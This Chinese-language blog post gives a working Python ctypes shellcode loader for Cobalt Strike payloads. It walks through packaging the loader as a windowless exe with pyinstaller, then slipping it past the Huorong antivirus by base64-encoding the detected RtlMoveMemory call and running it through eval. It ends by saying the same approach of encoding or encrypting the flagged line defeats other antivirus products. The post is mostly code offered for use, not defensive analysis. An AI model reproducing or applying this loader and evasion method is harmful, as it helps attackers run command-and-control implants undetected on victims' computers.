使用Python版本
使用cs生成与Python版本对应的shellcode
shellcode load
import ctypes
#shellcode加载
def shellCodeLoad(shellcode):
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
if __name__ == "__main__":
shellCodeLoad(bytearray(b'shellcode'))
使用cs生成的shellcode替换
使用pyinstaller将py文件打包为exe文件
pyinstaller -F test.py --noconsole
直接双击运行,正常上线
但是这个时候,默认的加载器已经被杀的连亲爹都不认识了
通过不断的编译测试,发现火绒的查杀点是在这一句代码上
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
试了一下改变量名,添加无效代码,修改代码的位置等等方法,火绒还是杀。
后来想到了php中免杀一句话中常用的eval(base64))这种方法,Python和PHP一样也是一个动态语言。
将上述代码替换为
eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
重新打包成为exe,正常上线
再扫描火绒已经妥妥的过掉了
本文重在说明思路,其他杀软同理。找到查杀点以后,编码,加密处理即可。
扫一扫
3214
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
